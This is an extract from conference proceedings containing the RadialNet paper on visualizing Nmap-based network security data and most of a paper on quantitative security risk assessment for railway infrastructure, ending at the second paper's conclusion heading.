Department of Computer Engineering and Automation Federal University of Rio Grande do Norte, 59078-970, Natal/RN, Brazil
[email protected] 2 Department of Informatics and Applied Mathematics Federal University of Rio Grande do Norte, 59078-970, Natal/RN, Brazil
[email protected] Abstract. The pervasive aspect of the Internet increases the demand for tools that support both monitoring and auditing of security aspects in computer networks. Ideally, these tools should provide a clear and objective presentation of security data in such a way as to let network administrators detect or even predict network security breaches. However, most of these data are still presented only in raw text form, or through inadequate data presentation techniques. Our work tackles this problem by designing and developing a powerful tool that aims at integrating several information visualization techniques in an effective and expressive visualization. We have tested our tool in the context of network security, presenting two case studies that demonstrate important features such as scalability and detection of critical network security issues.
1 Introduction The world’s reliance on the Internet and its evident vulnerability require a global effort to protect it against malicious uses and many forms of attacks. However, networks have remained a challenge for information retrieval and visualization because of the rich set of tasks that users want to perform and the complexity of the network data. Furthermore, most of the existing visual tools focuses their attention solely on the visual representation of a network’s topology, failing to couple this view with other relevant network data. A visual tool that offers an integrated view of a network’s topology and its security aspects in the same visualization is a great asset for network monitoring. An acceptable solution for this sort of problem should meet the following requirements: i) be able to represent a network with a large number (at least hundreds) of nodes; ii) provide mechanisms to navigate the information or the network’s topology; iii) afford a simple visual representation that displays all the data simultaneously; and iv) offer solutions to or completely avoid the data occlusion problem. Based on these requirements, we propose an interactive graphics application, called RadialNet, to assist the tasks of identifying security problems, locating available network services, monitoring network metrics, alerting on potential security breaches, and improving network configuration. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 168–179, 2009. c Springer-Verlag Berlin Heidelberg 2009
RadialNet: An Interactive Network Topology Visualization Tool
169
For that purpose, we enable users to manipulate and visualize the network data in a dynamic and contextualized fashion. In the next section we briefly describe some related work, highlighting the limitations and issues that drove our work. Next, in Section 3, we describe the data used in the case studies and their origin. We introduce the RadialNet in Section 4, providing implementation details. Section 5 presents a conceptual background on visualization, focusing on the methodology used in the development of our tool. Two case studies regarding security monitoring and scalability limits of our tool are discussed in Section 6. Finally, the concluding remarks are found in Section 7.
2 Related Work There exist numerous tools for computer network management that provide some way of monitoring or assessing the network’s configuration, services, and underlying topology. In general, they all offer some form of graphic representation of data but they rarely go beyond the usual display of logical connections between hosts. The tools fe3d [1] and nagios [2] are exceptions to this trend and have provided meaningful data picturing for network monitoring. Cheops-ng [3] is another commonly referenced network visualization tool, but it does not rely on a formal data visualization technique to draw network topology. The fe3d project is based on the three-dimensional cone tree visualization technique [4]. Cone tree is essentially an hierarchical technique, thus it does not handle well cyclic graphs, which is the model associated with a computer network. Furthermore, the cone tree technique faces the problem of information occlusion caused by the use of the depth dimension. This problem is often found in three-dimensional representations of data [5]. The goal of fe3d is to generate visualization for services, network devices, and operating systems installed on each of the network’s hosts. Nagios employs the radial layout visualization technique, commonly used in tree drawing [6]. Unlike cone tree, the radial positioning is capable of representing graphs with cycles, as long as there are just a few interconnections between cycles. The goal of nagios is to offer visualizations to help computer network management tasks. Another group of related work centers their effort on intrusion detection [7]. This task typically involves the use of a mechanism to exam user activity logs to identify suspicious or anomalous behavior that may indicate an attack. The work done by Muelder et al. [8], for instance, proposes the use of a port-based visualization system that helps sifting through large amounts of data corresponding to port scans. The rationale of their work is to rely on the visual-analytics skills of a viewer to detect intrusion and improve data mining approaches. The main difference between this approach and ours is the fact that we focus on the investigation of a network infra-structure to detect insecure configurations and represent this information in a simple and interactive visual metaphor, whereas they follow a visual data mining approach applied to (multivariate) log data, communicating their findings through several types of (often complex) visual representation that need to be coordinated and integrated by the user. The lessons learned from the analysis and comparison of several visual tools helped us to define some guidelines and to set requirements (c.f. Section 1) that guided us
170
J.P.S. Medeiros and S.R. dos Santos
during the design of our solution. For instance, it is important for a tool to support a high level of interaction in order to aid the task of network monitoring. Also, the visual metaphor should reflect the dynamic aspect of both the network and its related data, be able to support content navigation, and be simple enough to allow administrators to rapidly grasp the meaning of the representation. Lastly, we have noticed that most of the tools are limited to the presentation of a few dozen nodes because of the insufficient screen space available or due to occlusion issues. Therefore, our main motivation was to create an effective visual tool to deal with the problem of visualizing more than just the network topology. The solution proposed in this work aims at harnessing the power of visualization to integrate security and auditing data with the network’s underlying topology, following an interactive approach that enables content navigation.
3 Aspects of Network Security Visualization of security data from computer networks is an emerging area that brings its own challenges and idiosyncrasies [9]. To obtain security data from a network we employed the Nmap [10], which can accomplish the following: 1. 2. 3. 4. 5. 6.
Detect network devices like routers, switches, wireless access points, and firewalls; Detect remote operating system (OS fingerprinting); Discover services (e.g. FTP, DNS, HTTP, etc.); Provide a script engine to explore services; Probe paths that data packets take through the network (traceroute); and Determine link latency and route disruption.
We use items 1 to 4 to acquire data on the network host and to probe the available services, while the items 5 and 6 provide us with topology information and link latency. With these data in hands we are able to execute tasks such as: topology discovery; vulnerability assessment scans; inventory determination; detection of forbidden devices; and detection of unauthorized services. These tasks are valuable assets to help administrators in identifying host or sub-networks with problems within, say, the Internet. Basically the results acquired with Nmap make it possible to determine the inventory of a network and its topology. Yet, to make sense of the network’s problems and security issues discovered with Nmap we decided to relate our findings to a vulnerability database. Establishing such a relation provides a means to measure and quantify the network security status. In our case we did this by cross-referencing our data with the database from the National Institute of Standards and Technology, which is known as National Vulnerability Database (NVD) [11]. The NVD comprises a set of XML files that describe known security problems. We have created a relational database that combines data from the Nmap scans with the NVD files.
4 The RadialNet RadialNet integrates an array of information visualization techniques in an environment that handles any dataset represented with our abstract data model for a network with multivariate data nodes. Figure 1 shows its basic user interface.
RadialNet: An Interactive Network Topology Visualization Tool
171
Fig. 1. The RadialNet graphical user interface
The tool was developed with Python, PyCairo for the graphics rendering, and PyGTK and PyGObject to create the user interface [12]. To implement data tables we used Python dictionaries. The NVD XML files were stored in a relational database.
5 RadialNet Visualization Aspects The mapping of data in its original form into an abstract graphic representation was done in accordance with the reference model for visualization introduced by Card et al. [13]. The model comprises three chained data transformations, as shown in Figure 2. In the first transformation the raw data originates data tables, organized by variable types (i.e. nominal, ordinal, and quantitative). The second transformation maps the data tables to visual structures through an association between variable types and retinal variables [14]. The last transformation involves the application of view transformations on the visual structures to create new improved views.
Fig. 2. Card et al. reference model for visualization (adapted from [13])
172
J.P.S. Medeiros and S.R. dos Santos
For all three transformations the human interaction is critical, being responsible for fine-tuning the visualization to accomplish the intended analytic task. Next, we examine all three transformations in the context of computer network security and auditing. 5.1 Data Transformation The main source of raw data is the output of Nmap, which is a fairly complex XML file. We have extracted some of the fields and used them to query the NVD and retrieve, for instance, operating system version and vendor. Based on these data, we assign a vulnerability level to each host. Table 1 is a simplified version of a data table created from a XML output file as result of a Nmap scan. Table 1. Data fields classified by variable type: (N)ominal, (O)rdinal, (Q)uantitative Field Category Host State Reason Addrtype Hostname Security level Uptime
N N N N N O Q
Data items 192.168.0.1 192.168.0.2 up up reset echo-reply ipv4 ipv4 example1.edu example3.edu S I 210 1021
5.2 Visual Mapping There are many choices of visual mapping that can be used to represent a data table. However, for a mapping to be expressive it must represent graphically all the items from the data table [15]. The issue of how well a mapping can afford fast interpretation or convey more distinction among visual marks is called effectiveness [15]. Because effectiveness is inherently subjective and difficult to measure [16,17] we decided to give user control over the visual mapping process. Therefore, RadialNet provides an interface component for the data table that allows the viewer to change the suggested mapping between data table items and visual structures (i.e. visual marks + graphical properties). A node-link diagram has been chosen to represent the network topology. The nodes are arranged according to the radial layout [6], since this two-dimensional visualization technique is quite suitable for networks. This layout places nodes on concentric rings according to their depth in the tree; a subtree is then laid out over a sector of the ring associated to the subtree’s root. These sectors usually do not overlap. Although radial layout is not an ideal representation for cyclic graphs, we have adapted it so that it accommodates cycles and still preserves an appealing appearance. Besides, this representation helps realizing the typical tree-like hierarchical organization of a network, which is useful if one wishes to gain an overview of sub-networks and their relation.
RadialNet: An Interactive Network Topology Visualization Tool
173
Almost all security and auditing data (except host address) can be mapped to graphic properties such as color, size, and shape. For instance, we suggest, in the initial visual mapping, that link latency be mapped to edge thickness (the thicker the edge, the greater the latency). Also, the shape of a node (square, circle) indicates the type of device (switches, wireless access points, routers, and general purpose). In addition, the vulnerability level (categorized in three groups) is assigned to three colors: green (secure), yellow (compromised), and red (insecure). Another security related data, the number of discovered services, is mapped to the size of a visual marker. Extra information can still be encoded when we enable viewers to color the sector’s background according to certain query parameters. For example, the viewer might want to highlight parts of the network that support the FTP (File Transfer Protocol) service. Figure 3 presents an example of our initial suggested visual mapping.
Fig. 3. Network visualization following our suggest visual mapping. The bottom square presents icons that may also be associated with a node.
5.3 View Transformations View transformations are important because they reflect the dynamic process of visual investigation and should be handled interactively. Navigation in the information space is often a typical view transformation task, and may involve animation, zooming, panning, the collapsing of subtrees, or the rearrangement of nodes. Content navigation is done through an interactive rearrangement of nodes controlled by the viewer. By selecting any node but the one at the center of the rings the viewer triggers a slow-in/slow-out animation that smoothly moves the selected node to the center of visualization. The topology as a whole moves accordingly, in such a way as to minimize the crossing of edges, thereby reducing disorientation. The animation is calculated through linear interpolation of the polar coordinates of all nodes [18].
174
J.P.S. Medeiros and S.R. dos Santos
The data acquired with Nmap is rich in details that cannot be exposed to the viewers simultaneously, otherwise this might overwhelm them. The detail-on-demand technique addresses this issue in the following manner. When the user right-clicks on a node, a pop-up window appears and offers details of the scanned data such as; operating system, device type, hostname, uptime, and vulnerability report. Figure 4 provides an example of such pop-up window showing the services found in host 199.185.137.3 from Figure 3. The bottom window shows, for instance, data collected by the NSE (Nmap Script Engine), in that case, the entry table of a DNS (Domain Name Service) server.
Fig. 4. Pop-up window with detail-on-demand
Strategies to Handle Occlusion Poor scalability and cluttered views are two of the known limitations of diagram-node representation. To reduce the impact of these limitations on the visualization, we have provided three techniques that can be used in isolation or combined: filtering, distortion, and subgraph collapsing. Filtering can be performed on visual attributes (e.g. to hide labels, or turn on/off color shading) or data range (e.g. to set a range of values that should be kept in or removed from the visualization). Figure 5 demonstrates the data range filtering in which only the critical nodes (those in red color) remained in the visualization. As a result, the filtered view (right image of Figure 5) has more screen space for the network visualization to expand to. Zooming could be used to avoid occlusion, but it might present the side-effect of loosing context depending on the degree of zooming used. Focus+context (F+C) techniques tackles this issue by allowing viewers to focus on some detail without losing the context [19]. We use fisheye distortion [20] as our F+C method to alleviate information occlusion. The fisheye focus is placed on a ring and can be expanded and/or moved outwardly, increasing the space between rings. This is done in continuous fashion, providing a nice visual effect.
RadialNet: An Interactive Network Topology Visualization Tool
175
Fig. 5. Application of data range filtering on the original view (left image) to keep only critical nodes, shown in red (right image). Nodes on the right image have been automatically rearranged.
The collapsing of subgraph is the last resource in reducing occlusion, which should be used sparingly because it may cause the viewer to lose context. Nonetheless, the collapsing of subgraphs can be very useful in visualizing network with hundreds of nodes, as is demonstrated in Section 4. This procedure groups an entire subgraph into its root node, chosen by the viewer, as illustrated by the diagram of Figure 6.
Fig. 6. Collapsing a subgraph
5.4 Multiple Coordinated Views A view is a visual representation of the data we wish to visualize. When the data is very complex many views of the data may be needed to allow users to understand such complexity and, possibly, discover unforeseen relationships. The interaction between these multiple views and their behavior need to be coordinated to enable users to investigate, explore, or browse the complex data, as well as let them experiment with different scenarios simultaneously or to compare distinct views.
176
J.P.S. Medeiros and S.R. dos Santos
Fig. 7. Brushing through coordinated views: the highlighted regions on the left is reflected on the right image that shows a different view
In our work we have afforded a pair of coordinated views with support to two types of coordination: navigation and brushing. The former allows simultaneous animation of topology of two views generated with different mappings. For instance, one view may depict a security profile with vulnerability information, whereas the other view may represent a management profile of the same network, focusing on available services, types of machine, operating system, and usage statistics. Rotating or changing the focus on one view yields a corresponding modification on the other view. The later type of coordination, brushing [21], refers to a coupled interaction that happens when the selection of features in one view is immediately reflected on the other (Figure 7).
6 Case Studies The evaluation process in information visualization is challenging, especially when dealing with complex interfaces [22]. We have decided to show evidence of RadialNet usefulness by describing its application in a case study, while for the scalability issue we generated two artificial network datasets. 6.1 Scanning 50 Universities In this first application we executed security and vulnerability assessment scans over fifty universities on the Internet. For obvious reasons we have omitted the addresses and host names. Figure 8 presents a basic visualization with our suggested visual mapping: shapes → machine type, color and size → vulnerability, latency → line thickness, icons identifies the presence of firewalls, missing data is mapped to dashed lines, and connections that break hierarchy are represented as orange lines. Figure 8 shows us that 20 host have severe security problems (marks in red), and other 18 hosts (in yellow) are considered fairly insecure. Also, all destination hosts
RadialNet: An Interactive Network Topology Visualization Tool
177
Fig. 8. Visualization of 50 universities and their vulnerabilities
have their ports filtered (shown by a padlock icon) and five of them (the squares) have been identified as routers — four of them are wireless access point and the other is a switch. Further analysis done through brushing allowed us to highlight all nodes that have DNS services available. As we can see from Figure 8, only two servers fits the query (one with a red background and the other with a yellow background, both located at the top of Figure 8). In both cases we used detail-on-demand to verify that their address table was accessible, which may be regarded as a severe security breach. Finally, the same visualization can be used to perform a structural assessment of the network. The right hand portion of Figure 8 shows various alternative connections between nodes (links in orange), evidencing that an eventual failure in one of these nodes would not compromise data flow. Also, the distribution of nodes on rings facilitates the counting of hops between network nodes, and the link thickness makes it clear the network’s bottlenecks. 6.2 Scalability Tests To empirically determine RadialNet scalability we generate artificial networks in which nodes may have none, 5, 10, or 30 children. These are representative values for, respectively, local networks, small offices, and computer laboratories networks. Notice, for instance, that Figure 8 has 238 nodes in total, which could be visualized without node overlapping or context loss. The left image of Figure 9, a network with 500 nodes, also shows a fairly satisfactory result without node overlapping. In the second simulation, a network with 1000 nodes, the results were not satisfactory, though. The inset of the right image in Figure 9 clearly shows node overlapping. Nevertheless, we can still distinguish visual attributes, such as color and shape. We also ran tests on networks with the same amount of nodes but with a topology that emphasized depth rather than breadth, in which case the overall results were better.
178
J.P.S. Medeiros and S.R. dos Santos
Fig. 9. Visualization of a artificial network with (left) 500 nodes, and (right) 1000 nodes. Note the overlapping nodes in the inset of the right picture.
7 Conclusion In the present work we described RadialNet in terms of an information visualization reference model that maps data space into multiple coordinated views. We tested our tool in two case studies, focusing on both security and scalability aspects. Our motivation was to design an expressive and effective visualization tool, which supports the following features: i) ability to represent networks with hundreds of nodes; ii) capacity to support information navigation and recording of the navigation history, which helps re-visiting interesting views; iii) interaction through a simple user interface that encapsulates all the critical information needed to perform security and auditing assessment of networks, and; iv) integration of view transformation techniques to alleviate the occlusion problem found in a two-dimensional node-link diagram. RadialNet started out as a project accepted by the Google Summer of Code 2007 to be the visualization tool for the Nmap and Umit projects and has continually been evaluated by the OpenSource community since its release in November 2007. Finally, we recognize that RadialNet does have limitations regarding scalability and would benefit from a more rigorous user study evaluation. Still, the feedback received so far are encouraging and has confirmed our initial motivation: there still is a need for good network visualization tools that are able to integrate multi-valuable data to the network’s underlying topology in an meaningful and dynamic fashion.
References 1. 2. 3. 4.
Sandalski, S.: fe3d, http://projects.icapsid.net/fe3d/ Galstad, E.: Nagios, http://www.nagios.org/ Priddy, B.: Cheops-ng, http://cheops-ng.sourceforge.net/ Robertson, G.G., Mackinlay, J.D., Card, S.K.: Cone trees: animated 3d visualizations of hierarchical information. In: Proceedings of the 1991 SIGCHI Conference on Human factors in computing systems, pp. 189–194. ACM Press, New York (1991)
RadialNet: An Interactive Network Topology Visualization Tool
179
5. Chalmers, M.: Tutorial: Design and perception in information visualisation. In: 25th International Conference on Very Large Data Bases (1999) 6. Eades, P.: Drawing free trees. Bulletin of the Institute for Combinatorics and its Applications 5, 10–36 (1992) 7. Teoh, S.T., Ma, K.L., Wu, S.F., Jankun-Kelly, T.J.: Detecting flaws and intruders with visual data analysis. IEEE Comput. Graph. Appl. 24(5), 27–35 (2004) 8. Muelder, C., Ma, K.L., Bartoletti, T.: Interactive visualization for network and port scan detection. In: Valdes, A., Zamboni, D. (eds.) RAID 2005. LNCS, vol. 3858, pp. 265–283. Springer, Heidelberg (2006) 9. Conti, G.: Security Data Visualization – Graphical Techniques for Network Analysis, 1st edn. No Starch Press (2007) 10. Fyodor: Nmap, http://www.insecure.org/nmap/ 11. NIST: National Vulnerability Database – NVD, http://nvd.nist.gov/ 12. Lutz, M.: Programming Python, 3rd edn. O’Reilly Media, Sebastopol (2006) 13. Card, S., Mackinlay, J., Shneiderman, B. (eds.): Readings in Information Visualization Using Vision to Think. Morgan Kaufmann Publishers, Inc., San Francisco (1999) 14. Bertin, J.: Semiology of Graphics: Diagrams, Networks, Maps. University of Wisconsin Press (1983) 15. Mackinlay, J.: Automating the design of graphical presentations of relational information. ACM Transaction on Graphics 5(2), 110–141 (1986) 16. Frøkjær, E., Hertzum, M., Hornbæk, K.: Measuring usability: are effectiveness, efficiency, and satisfaction really correlated? In: CHI 2000: Proceedings of the SIGCHI conference on Human factors in computing systems, pp. 345–352. ACM, New York (2000) 17. Kosara, R., Healey, C.G., Interrante, V., Laidlaw, D.H., Ware, C.: User studies: Why, how, and when? Computer Graphics and Applications 623(4), 20–25 (2003) 18. Yee, K.P., Fisher, D., Dhamija, R., Hearst, M.A.: Animated exploration of dynamic graphs with radial layout. In: INFOVIS, pp. 43–50 (2001) 19. Mickinlay, J.D., Robertson, G.G., Card, S.K.: The perspective wall: detail and context smoothly integrated. In: Carroll, J.M., Tanner, P.P. (eds.) Proceedings of the 1987 SIGCHI Conference on Human Factors in Computing Systems and Graphics Interface, pp. 173–179. ACM Press, New York (1987) 20. Furnas, G.W.: The FISHEYE view: A new look at structured files. Technical Report #8111221-9, Bell Labs, Murray Hill, New Jersey 07974, U.S.A. (December 1981) 21. Becker, R., Cleveland, W.: Brushing scatterplots. Technometrics 29(2), 127–142 (1987) 22. Plaisant, C.: The challenge of information visualization evaluation. In: Proceedings of the working conference on Advanced Visual Interfaces (AVI 2004), pp. 109–116. ACM Press, New York (2004)
Quantitative Security Risk Assessment and Management for Railway Transportation Infrastructures Francesco Flammini1,2 , Andrea Gaglione2 , Nicola Mazzocca2 , and Concetta Pragliola1 1
ANSALDO STS - Ansaldo Segnalamento Ferroviario S.p.A. Via Nuova delle Brecce 260, Naples, Italy {francesco.flammini,concetta.pragliola}@ansaldo-sts.com 2 Universita’ di Napoli ”Federico II” Dipartimento di Informatica e Sistemistica Via Claudio 21, Naples, Italy {frflammi,andrea.gaglione,nicola.mazzocca}@unina.it
Abstract. Scientists have been long investigating procedures, models and tools for the risk analysis in several domains, from economics to computer networks. This paper presents a quantitative method and a tool for the security risk assessment and management specifically tailored to the context of railway transportation systems, which are exposed to threats ranging from vandalism to terrorism. The method is based on a reference mathematical model and it is supported by a specifically developed tool. The tool allows for the management of data, including attributes of attack scenarios and effectiveness of protection mechanisms, and the computation of results, including risk and cost/benefit indices. The main focus is on the design of physical protection systems, but the analysis can be extended to logical threats as well. The cost/benefit analysis allows for the evaluation of the return on investment, which is a nowadays important issue to be addressed by risk analysts. Keywords: Security, Quantitative Approaches, Risk Analysis, Cost/Benefit Evaluation, Critical Infrastructure Protection, Railways.
1
Introduction
Risk analysis is a central activity in the security assurance of critical railway transportation infrastructures and mass transit systems. In fact, the results of risk analysis are needed to guide the design of surveillance and protection systems [11]. Risk analysis is commonly performed using qualitative approaches, based on expert judgment and limited ranges for risk attributes (e.g. low, average, high)[10]. However, model-based quantitative approaches are more effective in determining the risk indices by taking into account the frequency of occurrence of threats (e.g. considering historical data) and analytically determining the consequences (damage of assets, service interruption, people injured, etc.). This allows for a fine tuning of the security system in order to optimize the overall investment. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 180–189, 2009. Springer-Verlag Berlin Heidelberg 2009
Quantitative Security Risk Assessment and Management
181
Usually, analysts refer to Risk Assessment as the process of measuring the expected risk as a combination of threat occurrence probability, system vulnerability and expected damage. Risk Management (or mitigation) is instead used to indicate the process of choosing the countermeasures and predicting their impact on risk reduction. The overall process (which can be iterative) is often referred to as risk analysis. While it does not seem to exist a generally accepted taxonomy, this is the meaning we will give to such terms in this paper. This paper concentrates on quantitative risk analysis approaches. There exist several issues related to the choice of implementing quantitative, analytical or model-based approaches: one is the availability of source data; another is the methodology to be used for the analysis, which is not straightforward. Several approaches to the risk analysis of critical infrastructures are available in the literature (see e.g. references [1] - [6]), but no one seems to precisely fit the specific application, since they are either qualitative, too much general (hence abstract) or tailored to different applications. In this paper we present the core of a quantitative framework based on a reference mathematical model (partly derived from [8]) supported by a specifically designed software tool. In particular, we have extended the classical risk equation in order to precisely evaluate the impact on risk indices of parameters related to protection mechanisms. This allows to achieve a balance between the investment on security technologies and the achieved risk mitigation. The method has been developed and experimented considering a railway transportation domain, but it is general enough to be adopted for the analysis of other types of critical infrastructures. At the moment, we have implemented a full working prototype of the tool to be adopted for risk evaluation and to support the design of security systems. The rest of this paper is organized as follows. Section 2 presents the method used for the analysis. Section 3 describes the aim and the features of the software tool we have developed. Section 4 provides an example application of quantitative risk analysis using the tool. Finally, Section 5 draws conclusions and provides some hints about future developments.
2
The Method
With reference to a specific threat, the quantitative risk R can be formally defined as follows: R=P ∗V ∗D (1) Where: – P is the frequency of occurrence of the threat, which can be measured in [events / year]; – V is the vulnerability of the system with respect to the threat, that is to say the probability that the threat will cause the expected consequences (damage); – D is an estimate of the measure of the expected damage occurring after a successful attack, which can be expressed in euros [û].
182
F. Flammini et al.
The vulnerability V is an adimensional parameter, since it represents the conditional probability: P (success|threat) (2) Therefore, a quantitative way to express the risk associated to a specific threat is to measure it in lost euros per year: [û/ year]. The overall risk can be obtained as the sum of the risks associated to all threats. Despite of the simplicity of (1), the involved parameters are not easy to obtain. The analysis involves both procedural and modeling aspects. Procedural aspects include brainstorming sessions, site surveys, design review, statistic data analysis, expert judgment, etc. Formal modeling languages which can be used to analytically compute P, V and D include Attack Trees, Bayesian Networks, Stochastic Petri Nets and possibly other formalisms which are able to take into account the uncertainty inherently associated to the risk as well as the possibility of strategic attacks [7]. In fact, the three parameters feature an inter-dependence which should be modeled, too. Protection mechanisms are able to reduce the risk by having three main effects: – Protective, aimed at the reduction of V – Deterrent, aimed at the reduction of P – Rationalizing, aimed at the reduction of D Therefore, by quantifying the listed effects it is possible to estimate the risk mitigation, considering any combination of threats and protection mechanisms. A possible way to compute risk mitigation is to associate threats and protection mechanisms by means of threat categories and geographical references, namely sites. A site can be considered as a particular kind of critical asset (actually, an aggregate asset), sometimes defined as ”risk entity”. Each threat happens in at least one site and, homogenously, each protection mechanism protects at least one site. For a railway infrastructure, a site can be an office, a bridge, a tunnel, a parking area, a platform, a control room, etc. In the assumption that: – – – –
Threat T belongs to category C ; Threat T happens in (or passes through) site S ; Protection M is installed in site S ; Protection M is effective on threat category C ;
then it can be affirmed that M protects against T. Basing on the above definitions, it is possible to express the overall risk to which the system is exposed as follows: RT = Ri ∗ (1 − EP ji ∗ COVj ) ∗ (1 − EDji ∗ COVj ) ∗ (1 − ERji ∗ COVj ) (3) i
j
Where: – RT is the total mitigated risk; – Ri is the initial risk associated to threat i (computed according to (1));
Quantitative Security Risk Assessment and Management
183
Fig. 1. Risk evaluation using sample data
– – – –
EP ji is an estimate of the protective effect of mechanism j on threat i; EDji is an estimate of the deterrent effect of mechanism j on threat i; ERji is an estimate of the rationalizing effect of mechanism j on threat i; COVji is a measure of the coverage of mechanism j (e.g. percentage of the physical area or perimeter of the site).
The values of parameters expressing coverage and effectiveness are in the range [0..1]. The formula can be validated by attempts using sample data and boundary analysis: for instance, when both the coverage and one of the effectiveness parameters are set to 1, the risk is mitigated to 0, as expected; on the opposite, if either the coverage or all the effectiveness parameters are set to 0, the risk is not mitigated at all. Fig. 1. reports an example risk evaluation based on (3) using sample data. In such evaluation it is assumed that a single protection mechanism is used and all the other data is kept constant. The cost/benefit index can be defined simply as the balance between the investment on security mechanisms and the achieved risk mitigation: EB = risk reduction - total investment in security = (RT − Ri )− Cj i
j
(4) Where: – EB is the Expected Benefit, which can be positive or negative; – Cj is the cost of the protection mechanism j, obtained considering all the significant costs (acquisition, installation, management, maintenance, etc.). Therefore, the return on investment can be obtained from the expected benefit EB considering the cost of the invested capital (which depends on the rate of interest, the years to pay-off, possible external funding, etc.). Expressions (3) and (4) need to be computed starting from a database of attack scenarios, sites, protection mechanisms and related significant attributes.
184
F. Flammini et al.
The management of such data and the computation of results are performed by an automatic tool which will be described in detail in next section.
3
The Tool
A tool has been developed which automatically manages risk data and evaluates risk and benefit indices starting from input data. The tool has been named simply Q-RA (Quantitative Risk Analysis), to be pronounced as [kura] (sounding like the Italian for ”cure”). In particular, the inputs of the tool are: – A list of threats, characterized by: • Threat identifier; • Short description of the attack scenario (including the adversary category, required tools, etc.); • Threat category (e.g. vandalism, theft, sabotage, terrorism, flooding, etc.); • Initial estimated P, V and D ; • Site (geographical reference). – A list of protection mechanisms, characterized by: • • • •
Protection mechanism identifier; Short description of the mechanism; List of threat categories on which the mechanism is effective; Expected protective (EP ji ), deterrent (EDji ) and rationalizing (ERji ) effectiveness; • Estimated coverage (COV ); • Site (geographical reference); • Annual cost (acquisition, management, maintenance, ecc.).
A database is used in order to store and correlate the input data. Data referring to economic aspects is also managed (number of years to dismiss, rate of interest, etc.). The tool provides features allowing the user for inserting the inputs, updating them to modify some parameters (i.e. frequency of threats) and finally removing them. Parameters can be chosen using average or worst case considerations. Sensitivity analysis can be performed acting on input data ranges in order to evaluate the effect of uncertainty intervals upon the computed results and possibly defining lower and upper bounds. The tool elaborates data according to the relationships defined in the database (in particular, using the common attributes of site and threat category) and the mathematical models of (3) and (4), providing: – The risk associated to each threat (Ri ) and the overall risk (RT ); – The total risk reduction considering all the threats;
Quantitative Security Risk Assessment and Management
185
– Annual cost of the single protection mechanism and of the whole security system; – Annual cost/benefit balance (EB ). The points listed above are part of the informal functional requirements specification. Application specific requirements have also been added, like the possibility of specifying a day/night attribute for both threats (some scenarios can not happen when the service is interrupted, e.g. a subway station is closed to the public) and protection mechanisms (some mechanisms, e.g. motion detection, can be activated only when the service is interrupted). Non functional requirements of the tool include user friendliness, data import / export facilities using standard formats (e.g. CSV, Comma Separated Values), platform independence and use of freeware software (possibly), user identification and rights management (still to be implemented). Some implementation details are reported in the following. The software design has been performed using an object-oriented approach based on the Unified Modeling Language (UML) and the Java programming language. In order to guarantee the persistence of objects (threats, protection mechanisms and sites), a relational database (based on MySQL) has been designed starting from Entity Relationship (E-R) diagrams. The GUI (Graphical User Interface) of the tool is web-based, exploiting JSP (Java Server Page) and Apache Tomcat technologies. As an example, the conceptual class diagram related to the specific domain is reported in Fig. 2, where the attributes and interrelationships of the entities described in the previous section are graphically shown.
Fig. 2. Conceptual class diagram
4
Example Application
Let us consider a case-study of a railway or subway station. The following threats against the infrastructure should be considered: – Damage to property and graffitism (vandalism) – Theft and aggressions to personnel and passengers (micro-criminality)
186
F. Flammini et al. Table 1. Attack scenarios considered in the example application
Threat Threat Id Description
Threat Category
Site
û
û
Est. P Est. Exp. Asset Exp. Service [#/Year] VInit D[K ] D[K ]
1
Graffitism
Vandalism
Station Ext.
60
0.9
0.5
0
2
Theft of PCs
Theft
Tech. Room
4
0.8
8
6
3
Glass Break
Vandalism
Station Ext.
12
1
0.5
0
4
Bombing
Terrorism Expl.
Platform
0.01
1
600
300
5
Hacking
Sabotage
Tlc Server
2
0.8
0
10
6
Gas Attack
Terrorism Chem.
Platform
0.01
1
10
150
Hall
70
1
0.1
0
Platform
50
1
0.1
0
Platform
4
0.9
5
0
Furniture 7
Vandalism Damage
8
Infrastruct.
Physical
Damage
Sabotage
Table 2. Protection mechanisms considered in the example application Prot. Countermeasure Acq. Manag. Id Description Cost Cost [K ] [K /Year]
û
û
Site
COV
Threat Categories
EP E D E R
1
Alarmed Fence
10
1
Station Ext. Station Int. (Night)
0.9
Vandalism Theft P. Sabotage
0.9 0.3 0.2 0.9 0.3 0.2 0.9 0.3 0.2
2
Volumetric Detector
5
1
Tech. Room
1
Theft
0.8 0.6 0.2
3
Video-surveillance (Internal)
150
20
Hall Platform
4
Chem. Detector
50
2
Platform
0.9
5
Intrusion Detection System
1
0.5
Tlc Server
1
6
Explosive Detector
50
2
Station Int.
1
Vandalism Theft 0.95 Sabotage Terrorism Expl. Terrorism Chem.
0.4 0.6 0.6 0.4 0.4
0.6 0.6 0.6 0.3 0.3
0.3 0.3 0.8 0.6 0.6
Terrorism Chem. 0.6 0.2 0.4 L. Sabotage
0.9
0
0
Sabotage 0.8 0.4 0.1 Terrorism Expl. 0.8 0.1 0.1
detectors are physically installed near turnstiles, but the protection is effective on the whole station internal.
– Manumission and forced service interruption (sabotage) – Bombing or spread of NBCR1 contaminators (terrorism) Let us consider the example scenarios reported in Table 1 and the protection mechanisms listed in Table 2, both referring to a specific station. It is assumed that the values are obtained by analyzing historical data of successful and unsuccessful attacks before and after adopting specific countermeasures (such data is usually available for comparable installations). The expected damage relates 1
Nuclear Bacteriologic Chemical Radiologic.
Quantitative Security Risk Assessment and Management
187
Fig. 3. The Q-RA input data mask for protection mechanisms
Fig. 4. Q-RA output data presentation for the example application
to the single attack and it is computed by predicting the expense needed to restore the assets and the possible consequences of service interruption (no human injury or loss is considered). The estimated annual cost of the protection
188
F. Flammini et al.
mechanisms also accounts for maintenance and supervision, while acquisition and installation costs are accounted separately. Please note that the effect of protection mechanisms may vary according to threat category. Furthermore, all the specified values should not be considered as real. The choice of real values would require an extensive justification, possibly via a model-based analysis, which is not in the scope of this paper. Fig. 3 reports a screenshot of the GUI representing the input mask for the attributes of protection mechanisms, while Fig. 4 reports the results of the example application computed by the tool. In the assumptions of the example, the positive expected benefit resulting from the adoption of the protection mechanisms clearly justifies the investment, the total benefit being 36722 û/year.
5
Conclusion
